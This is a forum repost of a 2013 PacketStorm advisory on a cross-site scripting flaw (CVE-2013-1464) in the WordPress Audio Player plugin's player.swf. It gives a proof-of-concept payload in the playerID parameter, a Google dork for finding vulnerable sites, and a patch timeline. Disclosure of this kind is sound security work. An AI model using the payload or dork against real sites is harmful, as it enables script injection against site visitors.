Praetorian503 Posted February 8, 2013 Report Posted February 8, 2013 WordPress Audio Player versions prior to 2.0.4.6 suffer from a cross site scripting vulnerability in player.swf.# Exploit Title: Wordpress Audio Player Plugin XSS in SWF# Release Date: 31/01/13# Author: hip [Insight-Labs]# Contact: hip@insight-labs.org | Website: http://insight-labs.org# Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip# Vendor Homepage: http://wpaudioplayer.com/# Tested on: XPsp3# Affected version: 2.0.4.6 before# Google Dork: inurl:/wp-content/plugins/audio-player/#Ref:CVE-2013-1464-----------------------------------------------------------------------------------------------------------------------# Introduction:Audio Player is a highly configurable but simple mp3 player for all your audio needs.-------------------------------------------------------------------------------------------------------------------------# XSS - Proof Of Concept:vulnerable path:/wp-content/plugins/audio-player/assets/player.swfvulnerabile parameter:playerIDPOC:/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}//-------------------------------------------------------------------------------------------------------------------------------------Patch:-------------- Vendor was notified on the 23/01/2013-- Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug------------------------------------------------------------------------------------------------------------------------- Source: PacketStorm Quote
